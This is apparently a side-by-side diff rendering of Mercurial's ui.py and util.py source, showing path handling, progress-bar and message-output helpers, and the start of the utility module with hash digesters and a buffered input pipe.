2200 ``pushloc`` is the raw locations pushes should be made to.
2200 ``pushloc`` is the raw locations pushes should be made to.
2201
2201
2202 If ``name`` is not defined, we require that the location be a) a local
2202 If ``name`` is not defined, we require that the location be a) a local
2203 filesystem path with a .hg directory or b) a URL. If not,
2203 filesystem path with a .hg directory or b) a URL. If not,
2204 ``ValueError`` is raised.
2204 ``ValueError`` is raised.
2205 """
2205 """
2206 if not rawloc:
2206 if not rawloc:
2207 raise ValueError(b'rawloc must be defined')
2207 raise ValueError(b'rawloc must be defined')
2208
2208
2209 # Locations may define branches via syntax <base>#<branch>.
2209 # Locations may define branches via syntax <base>#<branch>.
2210 u = util.url(rawloc)
2210 u = util.url(rawloc)
2211 branch = None
2211 branch = None
2212 if u.fragment:
2212 if u.fragment:
2213 branch = u.fragment
2213 branch = u.fragment
2214 u.fragment = None
2214 u.fragment = None
2215
2215
2216 self.url = u
2216 self.url = u
2217 self.branch = branch
2217 self.branch = branch
2218
2218
2219 self.name = name
2219 self.name = name
2220 self.rawloc = rawloc
2220 self.rawloc = rawloc
2221 self.loc = b'%s' % u
2221 self.loc = b'%s' % u
2222
2222
2223 # When given a raw location but not a symbolic name, validate the
2223 # When given a raw location but not a symbolic name, validate the
2224 # location is valid.
2224 # location is valid.
2225 if not name and not u.scheme and not self._isvalidlocalpath(self.loc):
2225 if not name and not u.scheme and not self._isvalidlocalpath(self.loc):
2226 raise ValueError(
2226 raise ValueError(
2227 b'location is not a URL or path to a local '
2227 b'location is not a URL or path to a local '
2228 b'repo: %s' % rawloc
2228 b'repo: %s' % rawloc
2229 )
2229 )
2230
2230
2231 suboptions = suboptions or {}
2231 suboptions = suboptions or {}
2232
2232
2233 # Now process the sub-options. If a sub-option is registered, its
2233 # Now process the sub-options. If a sub-option is registered, its
2234 # attribute will always be present. The value will be None if there
2234 # attribute will always be present. The value will be None if there
2235 # was no valid sub-option.
2235 # was no valid sub-option.
2236 for suboption, (attr, func) in pycompat.iteritems(_pathsuboptions):
2236 for suboption, (attr, func) in pycompat.iteritems(_pathsuboptions):
2237 if suboption not in suboptions:
2237 if suboption not in suboptions:
2238 setattr(self, attr, None)
2238 setattr(self, attr, None)
2239 continue
2239 continue
2240
2240
2241 value = func(ui, self, suboptions[suboption])
2241 value = func(ui, self, suboptions[suboption])
2242 setattr(self, attr, value)
2242 setattr(self, attr, value)
2243
2243
2244 def _isvalidlocalpath(self, path):
2244 def _isvalidlocalpath(self, path):
2245 """Returns True if the given path is a potentially valid repository.
2245 """Returns True if the given path is a potentially valid repository.
2246 This is its own function so that extensions can change the definition of
2246 This is its own function so that extensions can change the definition of
2247 'valid' in this case (like when pulling from a git repo into a hg
2247 'valid' in this case (like when pulling from a git repo into a hg
2248 one)."""
2248 one)."""
2249 try:
2249 try:
2250 return os.path.isdir(os.path.join(path, b'.hg'))
2250 return os.path.isdir(os.path.join(path, b'.hg'))
2251 # Python 2 may return TypeError. Python 3, ValueError.
2251 # Python 2 may return TypeError. Python 3, ValueError.
2252 except (TypeError, ValueError):
2252 except (TypeError, ValueError):
2253 return False
2253 return False
2254
2254
2255 @property
2255 @property
2256 def suboptions(self):
2256 def suboptions(self):
2257 """Return sub-options and their values for this path.
2257 """Return sub-options and their values for this path.
2258
2258
2259 This is intended to be used for presentation purposes.
2259 This is intended to be used for presentation purposes.
2260 """
2260 """
2261 d = {}
2261 d = {}
2262 for subopt, (attr, _func) in pycompat.iteritems(_pathsuboptions):
2262 for subopt, (attr, _func) in pycompat.iteritems(_pathsuboptions):
2263 value = getattr(self, attr)
2263 value = getattr(self, attr)
2264 if value is not None:
2264 if value is not None:
2265 d[subopt] = value
2265 d[subopt] = value
2266 return d
2266 return d
2267
2267
2268
2268
2269 # we instantiate one globally shared progress bar to avoid
2269 # we instantiate one globally shared progress bar to avoid
2270 # competing progress bars when multiple UI objects get created
2270 # competing progress bars when multiple UI objects get created
2271 _progresssingleton = None
2271 _progresssingleton = None
2272
2272
2273
2273
2274 def getprogbar(ui):
2274 def getprogbar(ui):
2275 global _progresssingleton
2275 global _progresssingleton
2276 if _progresssingleton is None:
2276 if _progresssingleton is None:
2277 # passing 'ui' object to the singleton is fishy,
2277 # passing 'ui' object to the singleton is fishy,
2278 # this is how the extension used to work but feel free to rework it.
2278 # this is how the extension used to work but feel free to rework it.
2279 _progresssingleton = progress.progbar(ui)
2279 _progresssingleton = progress.progbar(ui)
2280 return _progresssingleton
2280 return _progresssingleton
2281
2281
2282
2282
2283 def haveprogbar():
2283 def haveprogbar():
2284 return _progresssingleton is not None
2284 return _progresssingleton is not None
2285
2285
2286
2286
2287 def _selectmsgdests(ui):
2287 def _selectmsgdests(ui):
2288 name = ui.config(b'ui', b'message-output')
2288 name = ui.config(b'ui', b'message-output')
2289 if name == b'channel':
2289 if name == b'channel':
2290 if ui.fmsg:
2290 if ui.fmsg:
2291 return ui.fmsg, ui.fmsg
2291 return ui.fmsg, ui.fmsg
2292 else:
2292 else:
2293 # fall back to ferr if channel isn't ready so that status/error
2293 # fall back to ferr if channel isn't ready so that status/error
2294 # messages can be printed
2294 # messages can be printed
2295 return ui.ferr, ui.ferr
2295 return ui.ferr, ui.ferr
2296 if name == b'stdio':
2296 if name == b'stdio':
2297 return ui.fout, ui.ferr
2297 return ui.fout, ui.ferr
2298 if name == b'stderr':
2298 if name == b'stderr':
2299 return ui.ferr, ui.ferr
2299 return ui.ferr, ui.ferr
2300 raise error.Abort(b'invalid ui.message-output destination: %s' % name)
2300 raise error.Abort(b'invalid ui.message-output destination: %s' % name)
2301
2301
2302
2302
2303 def _writemsgwith(write, dest, *args, **opts):
2303 def _writemsgwith(write, dest, *args, **opts):
2304 """Write ui message with the given ui._write*() function
2304 """Write ui message with the given ui._write*() function
2305
2305
2306 The specified message type is translated to 'ui.<type>' label if the dest
2306 The specified message type is translated to 'ui.<type>' label if the dest
2307 isn't a structured channel, so that the message will be colorized.
2307 isn't a structured channel, so that the message will be colorized.
2308 """
2308 """
2309 # TODO: maybe change 'type' to a mandatory option
2309 # TODO: maybe change 'type' to a mandatory option
2310 if 'type' in opts and not getattr(dest, 'structured', False):
2310 if 'type' in opts and not getattr(dest, 'structured', False):
2311 opts['label'] = opts.get('label', b'') + b' ui.%s' % opts.pop('type')
2311 opts['label'] = opts.get('label', b'') + b' ui.%s' % opts.pop('type')
2312 write(dest, *args, **opts)
2312 write(dest, *args, **opts)
@@ -1,3611 +1,3611 b''
1 # util.py - Mercurial utility functions and platform specific implementations
1 # util.py - Mercurial utility functions and platform specific implementations
2 #
2 #
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 #
6 #
7 # This software may be used and distributed according to the terms of the
7 # This software may be used and distributed according to the terms of the
8 # GNU General Public License version 2 or any later version.
8 # GNU General Public License version 2 or any later version.
9
9
10 """Mercurial utility functions and platform specific implementations.
10 """Mercurial utility functions and platform specific implementations.
11
11
12 This contains helper routines that are independent of the SCM core and
12 This contains helper routines that are independent of the SCM core and
13 hide platform-specific details from the core.
13 hide platform-specific details from the core.
14 """
14 """
15
15
16 from __future__ import absolute_import, print_function
16 from __future__ import absolute_import, print_function
17
17
18 import abc
18 import abc
19 import collections
19 import collections
20 import contextlib
20 import contextlib
21 import errno
21 import errno
22 import gc
22 import gc
23 import hashlib
23 import hashlib
24 import itertools
24 import itertools
25 import mmap
25 import mmap
26 import os
26 import os
27 import platform as pyplatform
27 import platform as pyplatform
28 import re as remod
28 import re as remod
29 import shutil
29 import shutil
30 import socket
30 import socket
31 import stat
31 import stat
32 import sys
32 import sys
33 import time
33 import time
34 import traceback
34 import traceback
35 import warnings
35 import warnings
36
36
37 from .thirdparty import attr
37 from .thirdparty import attr
38 from .pycompat import (
38 from .pycompat import (
39 delattr,
39 delattr,
40 getattr,
40 getattr,
41 open,
41 open,
42 setattr,
42 setattr,
43 )
43 )
44 from hgdemandimport import tracing
44 from hgdemandimport import tracing
45 from . import (
45 from . import (
46 encoding,
46 encoding,
47 error,
47 error,
48 i18n,
48 i18n,
49 node as nodemod,
49 node as nodemod,
50 policy,
50 policy,
51 pycompat,
51 pycompat,
52 urllibcompat,
52 urllibcompat,
53 )
53 )
54 from .utils import (
54 from .utils import (
55 compression,
55 compression,
56 procutil,
56 procutil,
57 stringutil,
57 stringutil,
58 )
58 )
59
59
60 base85 = policy.importmod('base85')
60 base85 = policy.importmod('base85')
61 osutil = policy.importmod('osutil')
61 osutil = policy.importmod('osutil')
62
62
63 b85decode = base85.b85decode
63 b85decode = base85.b85decode
64 b85encode = base85.b85encode
64 b85encode = base85.b85encode
65
65
66 cookielib = pycompat.cookielib
66 cookielib = pycompat.cookielib
67 httplib = pycompat.httplib
67 httplib = pycompat.httplib
68 pickle = pycompat.pickle
68 pickle = pycompat.pickle
69 safehasattr = pycompat.safehasattr
69 safehasattr = pycompat.safehasattr
70 socketserver = pycompat.socketserver
70 socketserver = pycompat.socketserver
71 bytesio = pycompat.bytesio
71 bytesio = pycompat.bytesio
72 # TODO deprecate stringio name, as it is a lie on Python 3.
72 # TODO deprecate stringio name, as it is a lie on Python 3.
73 stringio = bytesio
73 stringio = bytesio
74 xmlrpclib = pycompat.xmlrpclib
74 xmlrpclib = pycompat.xmlrpclib
75
75
76 httpserver = urllibcompat.httpserver
76 httpserver = urllibcompat.httpserver
77 urlerr = urllibcompat.urlerr
77 urlerr = urllibcompat.urlerr
78 urlreq = urllibcompat.urlreq
78 urlreq = urllibcompat.urlreq
79
79
80 # workaround for win32mbcs
80 # workaround for win32mbcs
81 _filenamebytestr = pycompat.bytestr
81 _filenamebytestr = pycompat.bytestr
82
82
83 if pycompat.iswindows:
83 if pycompat.iswindows:
84 from . import windows as platform
84 from . import windows as platform
85 else:
85 else:
86 from . import posix as platform
86 from . import posix as platform
87
87
88 _ = i18n._
88 _ = i18n._
89
89
90 bindunixsocket = platform.bindunixsocket
90 bindunixsocket = platform.bindunixsocket
91 cachestat = platform.cachestat
91 cachestat = platform.cachestat
92 checkexec = platform.checkexec
92 checkexec = platform.checkexec
93 checklink = platform.checklink
93 checklink = platform.checklink
94 copymode = platform.copymode
94 copymode = platform.copymode
95 expandglobs = platform.expandglobs
95 expandglobs = platform.expandglobs
96 getfsmountpoint = platform.getfsmountpoint
96 getfsmountpoint = platform.getfsmountpoint
97 getfstype = platform.getfstype
97 getfstype = platform.getfstype
98 groupmembers = platform.groupmembers
98 groupmembers = platform.groupmembers
99 groupname = platform.groupname
99 groupname = platform.groupname
100 isexec = platform.isexec
100 isexec = platform.isexec
101 isowner = platform.isowner
101 isowner = platform.isowner
102 listdir = osutil.listdir
102 listdir = osutil.listdir
103 localpath = platform.localpath
103 localpath = platform.localpath
104 lookupreg = platform.lookupreg
104 lookupreg = platform.lookupreg
105 makedir = platform.makedir
105 makedir = platform.makedir
106 nlinks = platform.nlinks
106 nlinks = platform.nlinks
107 normpath = platform.normpath
107 normpath = platform.normpath
108 normcase = platform.normcase
108 normcase = platform.normcase
109 normcasespec = platform.normcasespec
109 normcasespec = platform.normcasespec
110 normcasefallback = platform.normcasefallback
110 normcasefallback = platform.normcasefallback
111 openhardlinks = platform.openhardlinks
111 openhardlinks = platform.openhardlinks
112 oslink = platform.oslink
112 oslink = platform.oslink
113 parsepatchoutput = platform.parsepatchoutput
113 parsepatchoutput = platform.parsepatchoutput
114 pconvert = platform.pconvert
114 pconvert = platform.pconvert
115 poll = platform.poll
115 poll = platform.poll
116 posixfile = platform.posixfile
116 posixfile = platform.posixfile
117 readlink = platform.readlink
117 readlink = platform.readlink
118 rename = platform.rename
118 rename = platform.rename
119 removedirs = platform.removedirs
119 removedirs = platform.removedirs
120 samedevice = platform.samedevice
120 samedevice = platform.samedevice
121 samefile = platform.samefile
121 samefile = platform.samefile
122 samestat = platform.samestat
122 samestat = platform.samestat
123 setflags = platform.setflags
123 setflags = platform.setflags
124 split = platform.split
124 split = platform.split
125 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
125 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
126 statisexec = platform.statisexec
126 statisexec = platform.statisexec
127 statislink = platform.statislink
127 statislink = platform.statislink
128 umask = platform.umask
128 umask = platform.umask
129 unlink = platform.unlink
129 unlink = platform.unlink
130 username = platform.username
130 username = platform.username
131
131
132 # small compat layer
132 # small compat layer
133 compengines = compression.compengines
133 compengines = compression.compengines
134 SERVERROLE = compression.SERVERROLE
134 SERVERROLE = compression.SERVERROLE
135 CLIENTROLE = compression.CLIENTROLE
135 CLIENTROLE = compression.CLIENTROLE
136
136
137 try:
137 try:
138 recvfds = osutil.recvfds
138 recvfds = osutil.recvfds
139 except AttributeError:
139 except AttributeError:
140 pass
140 pass
141
141
142 # Python compatibility
142 # Python compatibility
143
143
144 _notset = object()
144 _notset = object()
145
145
146
146
147 def bitsfrom(container):
147 def bitsfrom(container):
148 bits = 0
148 bits = 0
149 for bit in container:
149 for bit in container:
150 bits |= bit
150 bits |= bit
151 return bits
151 return bits
152
152
153
153
154 # python 2.6 still have deprecation warning enabled by default. We do not want
154 # python 2.6 still have deprecation warning enabled by default. We do not want
155 # to display anything to standard user so detect if we are running test and
155 # to display anything to standard user so detect if we are running test and
156 # only use python deprecation warning in this case.
156 # only use python deprecation warning in this case.
157 _dowarn = bool(encoding.environ.get(b'HGEMITWARNINGS'))
157 _dowarn = bool(encoding.environ.get(b'HGEMITWARNINGS'))
158 if _dowarn:
158 if _dowarn:
159 # explicitly unfilter our warning for python 2.7
159 # explicitly unfilter our warning for python 2.7
160 #
160 #
161 # The option of setting PYTHONWARNINGS in the test runner was investigated.
161 # The option of setting PYTHONWARNINGS in the test runner was investigated.
162 # However, module name set through PYTHONWARNINGS was exactly matched, so
162 # However, module name set through PYTHONWARNINGS was exactly matched, so
163 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
163 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
164 # makes the whole PYTHONWARNINGS thing useless for our usecase.
164 # makes the whole PYTHONWARNINGS thing useless for our usecase.
165 warnings.filterwarnings('default', '', DeprecationWarning, 'mercurial')
165 warnings.filterwarnings('default', '', DeprecationWarning, 'mercurial')
166 warnings.filterwarnings('default', '', DeprecationWarning, 'hgext')
166 warnings.filterwarnings('default', '', DeprecationWarning, 'hgext')
167 warnings.filterwarnings('default', '', DeprecationWarning, 'hgext3rd')
167 warnings.filterwarnings('default', '', DeprecationWarning, 'hgext3rd')
168 if _dowarn and pycompat.ispy3:
168 if _dowarn and pycompat.ispy3:
169 # silence warning emitted by passing user string to re.sub()
169 # silence warning emitted by passing user string to re.sub()
170 warnings.filterwarnings(
170 warnings.filterwarnings(
171 'ignore', 'bad escape', DeprecationWarning, 'mercurial'
171 'ignore', 'bad escape', DeprecationWarning, 'mercurial'
172 )
172 )
173 warnings.filterwarnings(
173 warnings.filterwarnings(
174 'ignore', 'invalid escape sequence', DeprecationWarning, 'mercurial'
174 'ignore', 'invalid escape sequence', DeprecationWarning, 'mercurial'
175 )
175 )
176 # TODO: reinvent imp.is_frozen()
176 # TODO: reinvent imp.is_frozen()
177 warnings.filterwarnings(
177 warnings.filterwarnings(
178 'ignore',
178 'ignore',
179 'the imp module is deprecated',
179 'the imp module is deprecated',
180 DeprecationWarning,
180 DeprecationWarning,
181 'mercurial',
181 'mercurial',
182 )
182 )
183
183
184
184
185 def nouideprecwarn(msg, version, stacklevel=1):
185 def nouideprecwarn(msg, version, stacklevel=1):
186 """Issue an python native deprecation warning
186 """Issue an python native deprecation warning
187
187
188 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
188 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
189 """
189 """
190 if _dowarn:
190 if _dowarn:
191 msg += (
191 msg += (
192 b"\n(compatibility will be dropped after Mercurial-%s,"
192 b"\n(compatibility will be dropped after Mercurial-%s,"
193 b" update your code.)"
193 b" update your code.)"
194 ) % version
194 ) % version
195 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
195 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
196
196
197
197
198 DIGESTS = {
198 DIGESTS = {
199 b'md5': hashlib.md5,
199 b'md5': hashlib.md5,
200 b'sha1': hashlib.sha1,
200 b'sha1': hashlib.sha1,
201 b'sha512': hashlib.sha512,
201 b'sha512': hashlib.sha512,
202 }
202 }
203 # List of digest types from strongest to weakest
203 # List of digest types from strongest to weakest
204 DIGESTS_BY_STRENGTH = [b'sha512', b'sha1', b'md5']
204 DIGESTS_BY_STRENGTH = [b'sha512', b'sha1', b'md5']
205
205
206 for k in DIGESTS_BY_STRENGTH:
206 for k in DIGESTS_BY_STRENGTH:
207 assert k in DIGESTS
207 assert k in DIGESTS
208
208
209
209
210 class digester(object):
210 class digester(object):
211 """helper to compute digests.
211 """helper to compute digests.
212
212
213 This helper can be used to compute one or more digests given their name.
213 This helper can be used to compute one or more digests given their name.
214
214
215 >>> d = digester([b'md5', b'sha1'])
215 >>> d = digester([b'md5', b'sha1'])
216 >>> d.update(b'foo')
216 >>> d.update(b'foo')
217 >>> [k for k in sorted(d)]
217 >>> [k for k in sorted(d)]
218 ['md5', 'sha1']
218 ['md5', 'sha1']
219 >>> d[b'md5']
219 >>> d[b'md5']
220 'acbd18db4cc2f85cedef654fccc4a4d8'
220 'acbd18db4cc2f85cedef654fccc4a4d8'
221 >>> d[b'sha1']
221 >>> d[b'sha1']
222 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
222 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
223 >>> digester.preferred([b'md5', b'sha1'])
223 >>> digester.preferred([b'md5', b'sha1'])
224 'sha1'
224 'sha1'
225 """
225 """
226
226
227 def __init__(self, digests, s=b''):
227 def __init__(self, digests, s=b''):
228 self._hashes = {}
228 self._hashes = {}
229 for k in digests:
229 for k in digests:
230 if k not in DIGESTS:
230 if k not in DIGESTS:
231 raise error.Abort(_(b'unknown digest type: %s') % k)
231 raise error.Abort(_(b'unknown digest type: %s') % k)
232 self._hashes[k] = DIGESTS[k]()
232 self._hashes[k] = DIGESTS[k]()
233 if s:
233 if s:
234 self.update(s)
234 self.update(s)
235
235
236 def update(self, data):
236 def update(self, data):
237 for h in self._hashes.values():
237 for h in self._hashes.values():
238 h.update(data)
238 h.update(data)
239
239
240 def __getitem__(self, key):
240 def __getitem__(self, key):
241 if key not in DIGESTS:
241 if key not in DIGESTS:
242 raise error.Abort(_(b'unknown digest type: %s') % k)
242 raise error.Abort(_(b'unknown digest type: %s') % k)
243 return nodemod.hex(self._hashes[key].digest())
243 return nodemod.hex(self._hashes[key].digest())
244
244
245 def __iter__(self):
245 def __iter__(self):
246 return iter(self._hashes)
246 return iter(self._hashes)
247
247
248 @staticmethod
248 @staticmethod
249 def preferred(supported):
249 def preferred(supported):
250 """returns the strongest digest type in both supported and DIGESTS."""
250 """returns the strongest digest type in both supported and DIGESTS."""
251
251
252 for k in DIGESTS_BY_STRENGTH:
252 for k in DIGESTS_BY_STRENGTH:
253 if k in supported:
253 if k in supported:
254 return k
254 return k
255 return None
255 return None
256
256
257
257
258 class digestchecker(object):
258 class digestchecker(object):
259 """file handle wrapper that additionally checks content against a given
259 """file handle wrapper that additionally checks content against a given
260 size and digests.
260 size and digests.
261
261
262 d = digestchecker(fh, size, {'md5': '...'})
262 d = digestchecker(fh, size, {'md5': '...'})
263
263
264 When multiple digests are given, all of them are validated.
264 When multiple digests are given, all of them are validated.
265 """
265 """
266
266
267 def __init__(self, fh, size, digests):
267 def __init__(self, fh, size, digests):
268 self._fh = fh
268 self._fh = fh
269 self._size = size
269 self._size = size
270 self._got = 0
270 self._got = 0
271 self._digests = dict(digests)
271 self._digests = dict(digests)
272 self._digester = digester(self._digests.keys())
272 self._digester = digester(self._digests.keys())
273
273
274 def read(self, length=-1):
274 def read(self, length=-1):
275 content = self._fh.read(length)
275 content = self._fh.read(length)
276 self._digester.update(content)
276 self._digester.update(content)
277 self._got += len(content)
277 self._got += len(content)
278 return content
278 return content
279
279
280 def validate(self):
280 def validate(self):
281 if self._size != self._got:
281 if self._size != self._got:
282 raise error.Abort(
282 raise error.Abort(
283 _(b'size mismatch: expected %d, got %d')
283 _(b'size mismatch: expected %d, got %d')
284 % (self._size, self._got)
284 % (self._size, self._got)
285 )
285 )
286 for k, v in self._digests.items():
286 for k, v in self._digests.items():
287 if v != self._digester[k]:
287 if v != self._digester[k]:
288 # i18n: first parameter is a digest name
288 # i18n: first parameter is a digest name
289 raise error.Abort(
289 raise error.Abort(
290 _(b'%s mismatch: expected %s, got %s')
290 _(b'%s mismatch: expected %s, got %s')
291 % (k, v, self._digester[k])
291 % (k, v, self._digester[k])
292 )
292 )
293
293
294
294
295 try:
295 try:
296 buffer = buffer
296 buffer = buffer
297 except NameError:
297 except NameError:
298
298
299 def buffer(sliceable, offset=0, length=None):
299 def buffer(sliceable, offset=0, length=None):
300 if length is not None:
300 if length is not None:
301 return memoryview(sliceable)[offset : offset + length]
301 return memoryview(sliceable)[offset : offset + length]
302 return memoryview(sliceable)[offset:]
302 return memoryview(sliceable)[offset:]
303
303
304
304
305 _chunksize = 4096
305 _chunksize = 4096
306
306
307
307
308 class bufferedinputpipe(object):
308 class bufferedinputpipe(object):
309 """a manually buffered input pipe
309 """a manually buffered input pipe
310
310
311 Python will not let us use buffered IO and lazy reading with 'polling' at
311 Python will not let us use buffered IO and lazy reading with 'polling' at
312 the same time. We cannot probe the buffer state and select will not detect
312 the same time. We cannot probe the buffer state and select will not detect
313 that data are ready to read if they are already buffered.
313 that data are ready to read if they are already buffered.
314
314
315 This class let us work around that by implementing its own buffering
315 This class let us work around that by implementing its own buffering
316 (allowing efficient readline) while offering a way to know if the buffer is
316 (allowing efficient readline) while offering a way to know if the buffer is
317 empty from the output (allowing collaboration of the buffer with polling).
317 empty from the output (allowing collaboration of the buffer with polling).
318
318
319 This class lives in the 'util' module because it makes use of the 'os'
319 This class lives in the 'util' module because it makes use of the 'os'
320 module from the python stdlib.
320 module from the python stdlib.
321 """
321 """
322
322
323 def __new__(cls, fh):
323 def __new__(cls, fh):
324 # If we receive a fileobjectproxy, we need to use a variation of this
324 # If we receive a fileobjectproxy, we need to use a variation of this
325 # class that notifies observers about activity.
325 # class that notifies observers about activity.
326 if isinstance(fh, fileobjectproxy):
326 if isinstance(fh, fileobjectproxy):
327 cls = observedbufferedinputpipe
327 cls = observedbufferedinputpipe
328
328
329 return super(bufferedinputpipe, cls).__new__(cls)
329 return super(bufferedinputpipe, cls).__new__(cls)
330
330
331 def __init__(self, input):
331 def __init__(self, input):
332 self._input = input
332 self._input = input
333 self._buffer = []
333 self._buffer = []
334 self._eof = False
334 self._eof = False
335 self._lenbuf = 0
335 self._lenbuf = 0
336
336
337 @property
337 @property
338 def hasbuffer(self):
338 def hasbuffer(self):
339 """True is any data is currently buffered
339 """True is any data is currently buffered
340
340
341 This will be used externally a pre-step for polling IO. If there is
341 This will be used externally a pre-step for polling IO. If there is
342 already data then no polling should be set in place."""
342 already data then no polling should be set in place."""
343 return bool(self._buffer)
343 return bool(self._buffer)
344
344
345 @property
345 @property
346 def closed(self):
346 def closed(self):
347 return self._input.closed
347 return self._input.closed
348
348
349 def fileno(self):
349 def fileno(self):
350 return self._input.fileno()
350 return self._input.fileno()
351
351
352 def close(self):
352 def close(self):
353 return self._input.close()
353 return self._input.close()
354
354
355 def read(self, size):
355 def read(self, size):
356 while (not self._eof) and (self._lenbuf < size):
356 while (not self._eof) and (self._lenbuf < size):
357 self._fillbuffer()
357 self._fillbuffer()
358 return self._frombuffer(size)
358 return self._frombuffer(size)
359
359
360 def unbufferedread(self, size):
360 def unbufferedread(self, size):
361 if not self._eof and self._lenbuf == 0:
361 if not self._eof and self._lenbuf == 0:
362 self._fillbuffer(max(size, _chunksize))
362 self._fillbuffer(max(size, _chunksize))
363 return self._frombuffer(min(self._lenbuf, size))
363 return self._frombuffer(min(self._lenbuf, size))
364
364
365 def readline(self, *args, **kwargs):
365 def readline(self, *args, **kwargs):
366 if len(self._buffer) > 1:
366 if len(self._buffer) > 1:
367 # this should not happen because both read and readline end with a
367 # this should not happen because both read and readline end with a
368 # _frombuffer call that collapse it.
368 # _frombuffer call that collapse it.
369 self._buffer = [b''.join(self._buffer)]
369 self._buffer = [b''.join(self._buffer)]
370 self._lenbuf = len(self._buffer[0])
370 self._lenbuf = len(self._buffer[0])
371 lfi = -1
371 lfi = -1
372 if self._buffer:
372 if self._buffer:
373 lfi = self._buffer[-1].find(b'\n')
373 lfi = self._buffer[-1].find(b'\n')
374 while (not self._eof) and lfi < 0:
374 while (not self._eof) and lfi < 0:
375 self._fillbuffer()
375 self._fillbuffer()
376 if self._buffer:
376 if self._buffer:
377 lfi = self._buffer[-1].find(b'\n')
377 lfi = self._buffer[-1].find(b'\n')
378 size = lfi + 1
378 size = lfi + 1
379 if lfi < 0: # end of file
379 if lfi < 0: # end of file
380 size = self._lenbuf
380 size = self._lenbuf
381 elif len(self._buffer) > 1:
381 elif len(self._buffer) > 1:
382 # we need to take previous chunks into account
382 # we need to take previous chunks into account
383 size += self._lenbuf - len(self._buffer[-1])
383 size += self._lenbuf - len(self._buffer[-1])
384 return self._frombuffer(size)
384 return self._frombuffer(size)
385
385
386 def _frombuffer(self, size):
386 def _frombuffer(self, size):
387 """return at most 'size' data from the buffer
387 """return at most 'size' data from the buffer
388
388
389 The data are removed from the buffer."""
389 The data are removed from the buffer."""
390 if size == 0 or not self._buffer:
390 if size == 0 or not self._buffer:
391 return b''
391 return b''
392 buf = self._buffer[0]
392 buf = self._buffer[0]
393 if len(self._buffer) > 1:
393 if len(self._buffer) > 1:
394 buf = b''.join(self._buffer)
394 buf = b''.join(self._buffer)
395
395
396 data = buf[:size]
396 data = buf[:size]
397 buf = buf[len(data) :]
397 buf = buf[len(data) :]
398 if buf:
398 if buf:
399 self._buffer = [buf]
399 self._buffer = [buf]
400 self._lenbuf = len(buf)
400 self._lenbuf = len(buf)
401 else:
401 else:
402 self._buffer = []
402 self._buffer = []
403 self._lenbuf = 0
403 self._lenbuf = 0
404 return data
404 return data
405
405
406 def _fillbuffer(self, size=_chunksize):
406 def _fillbuffer(self, size=_chunksize):
407 """read data to the buffer"""
407 """read data to the buffer"""
408 data = os.read(self._input.fileno(), size)
408 data = os.read(self._input.fileno(), size)
409 if not data:
409 if not data:
410 self._eof = True
410 self._eof = True
411 else:
411 else:
412 self._lenbuf += len(data)
412 self._lenbuf += len(data)
413 self._buffer.append(data)
413 self._buffer.append(data)
414
414
415 return data
415 return data
416
416
417
417
418 def mmapread(fp):
418 def mmapread(fp):
419 try:
419 try:
420 fd = getattr(fp, 'fileno', lambda: fp)()
420 fd = getattr(fp, 'fileno', lambda: fp)()
421 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
421 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
422 except ValueError:
422 except ValueError:
423 # Empty files cannot be mmapped, but mmapread should still work. Check
423 # Empty files cannot be mmapped, but mmapread should still work. Check
424 # if the file is empty, and if so, return an empty buffer.
424 # if the file is empty, and if so, return an empty buffer.
425 if os.fstat(fd).st_size == 0:
425 if os.fstat(fd).st_size == 0:
426 return b''
426 return b''
427 raise
427 raise
428
428
429
429
430 class fileobjectproxy(object):
430 class fileobjectproxy(object):
431 """A proxy around file objects that tells a watcher when events occur.
431 """A proxy around file objects that tells a watcher when events occur.
432
432
433 This type is intended to only be used for testing purposes. Think hard
433 This type is intended to only be used for testing purposes. Think hard
434 before using it in important code.
434 before using it in important code.
435 """
435 """
436
436
437 __slots__ = (
437 __slots__ = (
438 '_orig',
438 '_orig',
439 '_observer',
439 '_observer',
440 )
440 )
441
441
442 def __init__(self, fh, observer):
442 def __init__(self, fh, observer):
443 object.__setattr__(self, '_orig', fh)
443 object.__setattr__(self, '_orig', fh)
444 object.__setattr__(self, '_observer', observer)
444 object.__setattr__(self, '_observer', observer)
445
445
446 def __getattribute__(self, name):
446 def __getattribute__(self, name):
447 ours = {
447 ours = {
448 '_observer',
448 '_observer',
449 # IOBase
449 # IOBase
450 'close',
450 'close',
451 # closed if a property
451 # closed if a property
452 'fileno',
452 'fileno',
453 'flush',
453 'flush',
454 'isatty',
454 'isatty',
455 'readable',
455 'readable',
456 'readline',
456 'readline',
457 'readlines',
457 'readlines',
458 'seek',
458 'seek',
459 'seekable',
459 'seekable',
460 'tell',
460 'tell',
461 'truncate',
461 'truncate',
462 'writable',
462 'writable',
463 'writelines',
463 'writelines',
464 # RawIOBase
464 # RawIOBase
465 'read',
465 'read',
466 'readall',
466 'readall',
467 'readinto',
467 'readinto',
468 'write',
468 'write',
469 # BufferedIOBase
469 # BufferedIOBase
470 # raw is a property
470 # raw is a property
471 'detach',
471 'detach',
472 # read defined above
472 # read defined above
473 'read1',
473 'read1',
474 # readinto defined above
474 # readinto defined above
475 # write defined above
475 # write defined above
476 }
476 }
477
477
478 # We only observe some methods.
478 # We only observe some methods.
479 if name in ours:
479 if name in ours:
480 return object.__getattribute__(self, name)
480 return object.__getattribute__(self, name)
481
481
482 return getattr(object.__getattribute__(self, '_orig'), name)
482 return getattr(object.__getattribute__(self, '_orig'), name)
483
483
484 def __nonzero__(self):
484 def __nonzero__(self):
485 return bool(object.__getattribute__(self, '_orig'))
485 return bool(object.__getattribute__(self, '_orig'))
486
486
